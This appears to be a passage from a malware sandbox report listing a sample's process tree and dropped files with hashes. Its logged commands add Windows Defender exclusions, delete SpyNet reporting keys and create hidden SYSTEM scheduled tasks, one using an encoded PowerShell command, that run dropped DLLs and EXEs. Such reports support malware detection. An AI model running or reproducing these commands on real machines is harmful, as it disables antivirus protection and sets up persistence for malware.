                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:808
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    3⤵
                                                                                                                                                      PID:1116
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RZfGRCgJsrDIEOco /t REG_DWORD /d 0 /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:5056
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RZfGRCgJsrDIEOco /t REG_DWORD /d 0 /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:4676
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          3⤵
                                                                                                                                                            PID:4620
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt /t REG_DWORD /d 0 /reg:32
                                                                                                                                                            3⤵
                                                                                                                                                              PID:1968
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                              3⤵
                                                                                                                                                                PID:664
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:2300
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uqeRQcQeSVSWnHVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:68
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uqeRQcQeSVSWnHVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:4932
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:4084
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:4340
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:5004
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KCGdmeQdU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:1464
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KCGdmeQdU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:4152
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IoHaAJhEDYhU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:368
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IoHaAJhEDYhU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:2852
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FohpjzYDshfCC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:2848
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FohpjzYDshfCC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:3784
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /run /I /tn "goyEURBMd"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:4656
                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                        schtasks /CREATE /TN "goyEURBMd" /SC once /ST 02:52:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                        PID:4212
                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                        schtasks /run /I /tn "YsLxjqvMZrWymyIEG"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:5008
                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          schtasks /CREATE /TN "YsLxjqvMZrWymyIEG" /SC once /ST 02:49:20 /RU "SYSTEM" /TR "\"C:\Windows\Temp\RZfGRCgJsrDIEOco\aRhQLhcCIAxmkyn\VkIxkha.exe\" s7 /yUsite_idEUI 385118 /S" /V1 /F
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                          PID:3404
                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          schtasks /DELETE /F /TN "goyEURBMd"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:664
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:2172
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FohpjzYDshfCC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:684
                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:2388
                                                                                                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:824
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:4488
                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:3216
                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:2232
                                                                                                                                                                                                      • \??\c:\windows\system32\gpscript.exe
                                                                                                                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:1116
                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:884
                                                                                                                                                                                                          • C:\Windows\Temp\RZfGRCgJsrDIEOco\aRhQLhcCIAxmkyn\VkIxkha.exe
                                                                                                                                                                                                            C:\Windows\Temp\RZfGRCgJsrDIEOco\aRhQLhcCIAxmkyn\VkIxkha.exe s7 /yUsite_idEUI 385118 /S
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Drops Chrome extension
                                                                                                                                                                                                            • Drops desktop.ini file(s)
                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                            PID:2960
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                              PID:1984
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:4724
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\KCGdmeQdU\fvPatZ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "SMPpzaSdDqsJvHF" /V1 /F
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                PID:1504
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /DELETE /F /TN "bwKBwqZYjkqxftWshF"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:2084
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /DELETE /F /TN "SMPpzaSdDqsJvHF"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:3940
                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:1544
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /CREATE /TN "KVEvoYrDZKLqM2" /F /xml "C:\ProgramData\uqeRQcQeSVSWnHVB\vpwVAJY.xml" /RU "SYSTEM"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                      PID:4444
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /CREATE /TN "znrIDUvoucqewg" /F /xml "C:\Program Files (x86)\IoHaAJhEDYhU2\WDETUbJ.xml" /RU "SYSTEM"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                      PID:512
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /CREATE /TN "RHUfDusjVndeEILcZ2" /F /xml "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\SpazMOf.xml" /RU "SYSTEM"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                      PID:3404
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /END /TN "SMPpzaSdDqsJvHF"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:368
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                        schtasks /CREATE /TN "BxzpJXegsLHBOSWsuyU2" /F /xml "C:\Program Files (x86)\FohpjzYDshfCC\nuiraGZ.xml" /RU "SYSTEM"
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                        PID:2172
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                        schtasks /CREATE /TN "SMPpzaSdDqsJvHF2" /F /xml "C:\Program Files (x86)\KCGdmeQdU\lrpKCnc.xml" /RU "SYSTEM"
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                        PID:1436
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                        schtasks /run /I /tn "EtrQGzrpWMpnyWxNE"
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:804
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                          schtasks /CREATE /TN "EtrQGzrpWMpnyWxNE" /SC once /ST 01:23:14 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\RZfGRCgJsrDIEOco\WMHlLqqk\yHwbNSt.dll\",#1 /Lcsite_idnqK 385118" /V1 /F
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                          PID:4652
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                          schtasks /DELETE /F /TN "YsLxjqvMZrWymyIEG"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:3940
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:824
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:3184
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:4088
                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                PID:2648
                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:4644
                                                                                                                                                                                                                                • \??\c:\windows\system32\rundll32.EXE
                                                                                                                                                                                                                                  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\RZfGRCgJsrDIEOco\WMHlLqqk\yHwbNSt.dll",#1 /Lcsite_idnqK 385118
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:4080
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:2024

                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      47KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      e547a31e8839f8e54587c99e97c4c33c

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      9bfbf630c9398eedbfa40cba01f122a1ed675e02

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      f8bdf7f6ffa4e58856a4f840ffdd5b33bdd8f574c662054c11270e273d4cd475

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      241ac524cff7ffece28a50eb5fe7d9866591c15ed1d10b108baa016a6abc9c191500d78b12ddb9a2e41babae17fb3a945c146b09bc1e420074495c42d294263f

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      187B

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      136B

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      150B

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      10KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      f32260503a0d5ccca2e558cb462dcc52

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      ebf989673e2c371bb6885937caff191154073f43

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      3348480cf1eeae3d346a5ce118ed0ee877cd9f820e9de9ba5ce4827306db8f14

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      f9de50dd58e125a38ad9b1f84adcbf969792455ce30098835d120af0ddab7ff0cac24a9fba8f028975a79e004224b1d91558012904b46e96e403891dbc6a737d

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      a073da515841186e51ba0eef1b42e9e9

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      e83f4149618ad8c5be8605dffb73d7096849e930

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      3eebe505e757b2f18b7c46c026ee85711fcf70012dc489d409c13582f8dde363

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      d3a6583f58b88ec9ab37afd337db032f6f36204ebaa53a808b4e23425cd361bb74cf709d85ee9a3da60ad2ae5c3d4d03707a86e396b93cc792379ff3b9b60214

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      db01a2c1c7e70b2b038edf8ad5ad9826

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      540217c647a73bad8d8a79e3a0f3998b5abd199b

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      19KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      5e4070f01a6b16dd69169033fd298720

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      583c95d9cad54617125af4b729e9213169c1772d

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      2a0895738ef9e0759f41c5f7e06a6190a07c5a7f00ab44224106cfe87550cdbf

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      1d9ff7f234618ca5fcbf9b7373d2b279253bc806880bb4e7a84e3acbd1cf2ae81397499879c60f1eaa2673ef90ec5299acb65e61691d896cf8f2d1168d149d67

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      18KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      dbfb7ab0514b3309a9647dec446f9802

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      58a33df8e98bbd611cd88206b2363ec9f04bc893

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      df32a1c549f93f9cf4ad8a77c33d7ff2c0fc37f58364f88365163dff801c854a

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      c23d32c8a1e2837a418ad9bf4e6239cf711e6234f98f4a32f96bd0b4b48eef9397f47fa4905e1b9daff698564b50f1b5ec35c6297d1f14190590b7552ad24ad2

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\mlb64NOLl5sxzm5WJbtT033Y.exe

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      119KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      17ac9d681996d836936a963f20a8298f

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      ebe2c88488b6940efd5a250c4c3b0b4764f0d471

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      f5ba7758b4ccdb88f03d08b9853e9db56c9169b461099d381f844976f4c2375f

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      3110f6fe782033001cbec6e835422fccf5b092e7c35f38c68dc556d3e0029f322e94f5f6309375557eb59dbb2686a7adbf0fa40e87822c167d0370f0c90e682f

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040342241\additional_file0.tmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      47KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      515db84af8eace805caad5cfceb483a0

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      4d93796f7fee2ff47e959a153f5d6cd5f2b6cc5d

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      0c78af5525f3110fbdf2e281e0e8e3278b717902d62fdac083b05b7b053f1f75

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      0879f68339b32d88ed7817e72fd9df17b289e6dc1f4997bf92b9fbaa1ef39368236ce5583f7f40c3c8a06914539cd1f0564c27dcb6976665f43fdbd2bdc170de

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040342241\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      71KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      142b88219a59347c77548871da514af7

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      23a2c08afed6f4b5240b0933234543dc8ef33c3a

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      178caf31a64cff8b47575c680750c815b32b43765c9080c98090d1fde27ee974

